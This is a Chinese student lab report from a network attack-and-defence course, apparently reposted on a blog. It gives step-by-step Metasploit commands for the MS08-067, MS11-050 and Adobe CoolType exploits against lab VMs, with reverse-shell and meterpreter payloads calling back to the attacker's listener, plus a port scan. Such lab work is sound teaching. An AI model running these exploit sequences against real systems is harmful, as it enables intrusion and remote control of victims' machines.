1. 程式人生 > >2018-2019-2 20165329《網絡攻防技術》Exp5 MSF基礎應用

2018-2019-2 20165329《網絡攻防技術》Exp5 MSF基礎應用

handler 總結 使用 -s sp2 ner 分享圖片 解釋 要求

2018-2019-2 20165329《網絡攻防技術》Exp5 MSF基礎應用

一、實驗

一個主動攻擊實踐,ms08_067 ;

一個針對瀏覽器的攻擊,MS11-050 ;

一個針對客戶端的攻擊,Adobe ;

成功應用任何一個輔助模塊。

二、攻擊實例

Exp5-1 實現ms08_067

  • 1.Windows服務滲透攻擊——MS08-067安全漏洞

①攻擊機:kali ②靶機:windows XP SP3(English)

可以ping通。
技術分享圖片

在攻擊機kali輸入msfconsole進入控制臺,依次輸入以下指令:

  • msf >search ms08-067

    //使用search命令搜尋有關漏洞MS08_067的相關信息
    技術分享圖片

  • msf > use exploit/windows/smb/ms08_067_netapi
  • msf exploit(ms08_067_netapi)> show payloads//查看可以供我們使用的payload:
    技術分享圖片

  • msf exploit(ms08_067_netapi)> set payload generic/shell_reverse_tcp //tcp反向回連
  • msf exploit(ms08_067_netapi)> set LHOST 192.168.72.131攻擊者ip
  • msf exploit(ms08_067_netapi)> set LPORT 5329
  • msf exploit(ms08_067_netapi)> set RHOST 192.168.72.135 //靶機ip
  • msf exploit(ms08_067_netapi)> set target 0 //自動選擇目標系統類型
    技術分享圖片

  • msf exploit(ms08_067_netapi) > exploit
  • 成功!攻擊結果如下:
    技術分享圖片

技術分享圖片

技術分享圖片

Exp5-2 實現ms11_050

①攻擊機:kali ②靶機:WindowsXP Professional sp2/Windows7專業版 ③IE版本:7.0/8.0

在攻擊機kali輸入msfconsole進入控制臺,依次輸入以下指令:

  • msf > use windows/browser/ms11_050_mshtml_cobjectelement
  • msf exploit(ms11_050_cobjectelement) > set payload windows/meterpreter/reverse_http //http反向回連
  • msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.72.131 //攻擊機ip
  • msf exploit(ms11_050_cobjectelement) > set LPORT 5329 //攻擊端口固定
  • msf exploit(ms11_050_cobjectelement) > set URIPATH rhl29 //統一資源標識符路徑設置
  • msf exploit(ms11_050_cobjectelement) > exploit
  • 成功得到Local ip:
    技術分享圖片

  • 用靶機訪問http://192.168.72.131:8080/rhl29 ,出現了彈窗警告:
    技術分享圖片

技術分享圖片

    • 嘗試修改一下ie瀏覽器的相關設置,降低其安全等級
      技術分享圖片

    • 第二次在IE中訪問以上網址還是失敗了...很難受...
      技術分享圖片

Exp5-3 實現Adobe

①攻擊機:kali ②靶機:windowsXP Professional sp2 ③Adobe版本:9.3

在攻擊機kali輸入msfconsole進入控制臺,依次輸入以下指令:

  • msf > use windows/fileformat/adobe_cooltype_sing
  • msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp //tcp反向回連
  • msf exploit(adobe_cooltype_sing) > set LHOST 192.168.72.131 //攻擊機ip
  • msf exploit(adobe_cooltype_sing) > set LPORT 5329 //攻擊端口
  • msf exploit(adobe_cooltype_sing) > set FILENAME 20165329.pdf //設置生成pdf文件的名字
  • msf exploit(adobe_cooltype_sing) > exploit //攻擊
  • 成功生成pdf。
    技術分享圖片

  • 由於生成的文件是隱藏文件使用copy命令把其復制到別的目錄中去。
    技術分享圖片

  • 將pdf文件傳送或拷貝到靶機上後,在kali上輸入back退出當前模塊,進入監聽模塊,輸入以下命令:
msf > use exploit/multi/handler //進入監聽模塊
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp //tcp反向連接
msf exploit(handler) > set LHOST 192.168.72.131 //攻擊機ip
msf exploit(handler) > set LPORT 5329 //攻擊端口固定
msf exploit(handler) > exploit
  • 再把靶機上打開pdf文件,回連成功。
    技術分享圖片

技術分享圖片

Exp5-4 實現輔助模塊

一、掃描端口

  • msf > use auxiliary/scanner/portscan/syn(使用portscan模塊)
  • msf auxiliary(syn) > show options
  • msf auxiliary(syn) > set RHOSTS 192.168.72.137(目標)
  • msf auxiliary(syn) > set THREADS 50(線程)
  • msf auxiliary(syn) > exploit
    由於掃描時間比較長,提前終止了。
    技術分享圖片

二、掃描靶機的TCP端口使用情況

    • 輸入以下指令:
      技術分享圖片

    • run開啟掃描,可以看到在winxp靶機上所有tcp端口的使用情況

三、實驗總結

本次實驗沒有什麽特別難的地方,主要在環境的配置上,自己配置了好久但還是不成功,最後拷了配置好的虛擬機。體會到了metasploit攻擊漏洞的專一性,對操作系統和軟件版本都有細致的要求。必須要在特定環境和特定觸發條件下才能成功。感受到了實踐和真實攻擊的差距。


2.離實戰還缺些什麽技術
感覺大部分是按照教程來做的,離實戰還很遙遠
3.用自己的話解釋什麽是exploit,payload,encode.
exploit攻擊者對靶機進行滲透攻擊的這一過程

payload類似於之前實驗中的shellcode,是攻擊者進行攻擊的“武器”

encode編碼改編代碼,防殺軟識別

2018-2019-2 20165329《網絡攻防技術》Exp5 MSF基礎應用